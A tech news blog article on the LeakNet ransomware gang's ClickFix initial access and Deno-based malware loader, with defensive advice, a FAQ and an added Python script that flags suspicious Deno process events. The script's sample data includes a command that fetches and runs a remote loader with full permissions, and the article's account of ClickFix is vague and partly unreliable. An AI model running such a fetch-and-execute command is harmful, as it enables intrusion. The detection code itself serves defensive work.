New Ransomware Targets Businesses with Stealthy Techniques

Mar 18, 2026 1 min read by Ciro Simone Irmici

The LeakNet ransomware gang is deploying stealthy new tactics, including ClickFix for initial access and a Deno runtime-based malware loader, to infiltrate corporate networks and encrypt data, posing a significant threat to businesses.

In today's interconnected digital landscape, the threat of ransomware continues to evolve, making it crucial for businesses and individuals alike to stay informed about the latest attack methods. The emergence of new, stealthier techniques employed by cybercriminals like the LeakNet ransomware gang highlights the constant need for vigilance and robust cybersecurity practices.

Understanding these sophisticated tactics is not just for IT professionals; it's essential for anyone who uses technology to protect their data, maintain productivity, and secure their digital life from increasingly cunning adversaries.

The Quick Take

  • Threat Actor: The LeakNet ransomware gang is behind these recent attacks.
  • Initial Access: They utilize a technique called 'ClickFix' to gain stealthy entry into corporate networks.
  • New Malware Loader: A novel loader based on the open-source Deno runtime (for JavaScript and TypeScript) is being deployed.
  • Target: Primarily focused on compromising corporate environments.
  • Goal: To encrypt data and extort payment, characteristic of ransomware operations.

What's Happening

The cybersecurity landscape is constantly shifting, with threat actors continuously developing new methods to bypass defenses. Recent reports from BleepingComputer highlight a significant evolution in the tactics of the LeakNet ransomware gang. This group is now employing a sophisticated combination of techniques to infiltrate and compromise corporate environments, making their attacks harder to detect and mitigate.

One of the key innovations in their arsenal is the use of the 'ClickFix' technique for initial access. While specific details of ClickFix are often proprietary to threat intelligence, it generally refers to an advanced social engineering or exploit method designed to trick users or bypass security controls during the initial infection phase. This allows the ransomware to gain a foothold in the target network without immediately raising alarms.

Once inside, LeakNet deploys a new malware loader that leverages the Deno runtime. Deno is an open-source runtime environment for JavaScript and TypeScript, similar to Node.js. Its use in malware is relatively uncommon, so it is less likely to be detected by traditional security solutions that are attuned to more common attack tools and frameworks. This approach lets the ransomware load its malicious payload more stealthily, complicating detection and forensic analysis for cybersecurity teams.

Why It Matters

This development is critically important for anyone operating in a digital environment, especially businesses. Ransomware attacks, in general, are devastating. They can lead to significant financial losses from ransoms paid, recovery costs, and business interruption. Beyond the immediate financial impact, ransomware can cause irreversible data loss, reputational damage, and severe operational disruptions that can take weeks or even months to resolve. The use of 'ClickFix' for initial access underscores the persistent threat of social engineering and the need for heightened user awareness, as human error remains one of the easiest ways for attackers to gain entry.

The integration of the Deno runtime into LeakNet's attack chain is particularly concerning from a cybersecurity perspective. Deno is a legitimate, modern platform that is often overlooked by security tools not specifically designed to monitor its execution. This means that traditional endpoint detection and response (EDR) or antivirus solutions might not flag Deno-based malicious scripts as readily as they would more common malware frameworks. The ransomware can therefore operate with a higher degree of stealth, giving it more time to establish persistence, move laterally within a network, and ultimately encrypt critical data before detection. Although these attacks directly target corporate networks, the techniques used by ransomware gangs eventually trickle down or inspire other threats, so general awareness of these advanced evasion tactics is crucial for everyday users' digital hygiene.

What You Can Do

Protecting yourself and your organization from sophisticated threats like LeakNet requires a layered approach to cybersecurity. Here are actionable steps you can take:

  • Educate Employees on Phishing and Social Engineering: Regularly train staff to recognize and report suspicious emails, links, and communications. Since ClickFix often relies on user interaction, a well-informed workforce is your first line of defense.
  • Implement Robust Email Filtering: Utilize advanced email security solutions that can detect and block malicious attachments, links, and phishing attempts before they reach employee inboxes.
  • Maintain Regular, Offline Backups: Regularly back up all critical data to an offline or immutable storage solution. In the event of a ransomware attack, this allows you to restore your systems without paying a ransom.
  • Keep All Software and Operating Systems Updated: Promptly apply security patches and updates for all software, operating systems, and firmware. This closes known vulnerabilities that attackers might exploit for initial access.
  • Deploy Advanced Endpoint Detection and Response (EDR): Invest in EDR solutions that offer behavioral analysis and threat hunting capabilities, which can help detect unusual process activity such as the Deno runtime being used in unexpected ways.
  • Implement Multi-Factor Authentication (MFA): Enable MFA on all accounts, especially for remote access, cloud services, and privileged accounts. This significantly reduces the risk of unauthorized access even if credentials are compromised.
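
The behavioral check described in the EDR item above, as an added example (not from the original article or from BleepingComputer's reporting): a Python triage function that flags Deno process-creation events that look out of place. The event field names are modeled on Sysmon Event ID 1, and the host allowlist, directory list, parent list and sample events are assumptions constructed for illustration, not LeakNet indicators.

```python
import re
from pathlib import PureWindowsPath

# Assumptions: fields modeled on Sysmon Event ID 1 (process creation); the
# allowlist and heuristics below are illustrative, not LeakNet indicators.
APPROVED_DENO_HOSTS = {"DEV-WS-014"}  # hosts where Deno is a sanctioned dev tool
ODD_PARENTS = {"explorer.exe", "mshta.exe", "wscript.exe", "winword.exe", "outlook.exe"}
STAGING_DIRS = ("\\appdata\\local\\temp\\", "\\downloads\\", "\\programdata\\", "\\users\\public\\")
ALLOW_ALL = re.compile(r"(?:^|\s)(?:-A|--allow-all)(?:\s|$)")  # Deno's grant-everything flag
REMOTE_SCRIPT = re.compile(r"\s(?:run|eval)\b.*https?://", re.IGNORECASE)

def deno_findings(event):
    """Return the reasons a Deno process-creation event looks out of place."""
    if PureWindowsPath(event["Image"]).name.lower() not in ("deno.exe", "deno"):
        return []
    reasons = []
    image, cmd = event["Image"].lower(), event["CommandLine"]
    if event["Computer"] not in APPROVED_DENO_HOSTS:
        reasons.append("deno on host without approved install")
    if any(d in image for d in STAGING_DIRS):
        reasons.append("runtime executed from staging directory")
    if PureWindowsPath(event["ParentImage"]).name.lower() in ODD_PARENTS:
        reasons.append("unusual parent process")
    if ALLOW_ALL.search(cmd):
        reasons.append("all permissions granted (-A/--allow-all)")
    if REMOTE_SCRIPT.search(cmd):
        reasons.append("script loaded from remote URL")
    return reasons

def triage(events):
    """Return (host, reasons) for every event with two or more findings."""
    return [(e["Computer"], r) for e in events if len(r := deno_findings(e)) >= 2]

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "DEV-WS-014", "Image": r"C:\Users\dev\.deno\bin\deno.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "deno run --allow-net=api.example.com server.ts"},
    {"Computer": "FIN-PC-031", "Image": r"C:\Users\amy\AppData\Local\Temp\rt\deno.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "deno.exe run -A https://example.invalid/loader.ts"},
    {"Computer": "FIN-PC-031", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_EVENTS).items() if False else triage(SAMPLE_EVENTS):
        print(host, "->", "; ".join(reasons))
```

Requiring two or more findings keeps a sanctioned developer workstation quiet while still surfacing a runtime that appears on a non-developer host with broad permissions.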

Common Questions

Q: What exactly is ransomware?

A: Ransomware is a type of malicious software that encrypts a victim's files, rendering them inaccessible. Attackers then demand a ransom, usually in cryptocurrency, in exchange for a decryption key. If the ransom isn't paid, the data may be permanently lost or leaked.

Q: How does 'ClickFix' help ransomware?

A: 'ClickFix' refers to a technique used for initial access, often involving sophisticated social engineering or exploit methods. It's designed to bypass initial security layers or trick users into executing malicious code, helping the ransomware establish a stealthy foothold within a network.

Q: Why is using 'Deno runtime' significant for an attack?

A: Deno is a relatively new and less commonly used runtime for JavaScript/TypeScript, compared to older alternatives. Its novelty means that many traditional security tools might not have specific detection signatures or behavioral analytics for Deno, allowing malware using it to operate with increased stealth and evade detection more easily.

Sources

Based on content from BleepingComputer.

Ciro Simone Irmici
Author, Digital Entrepreneur & AI Automation Creator
Written and curated by Ciro Simone Irmici · About TechPulse Daily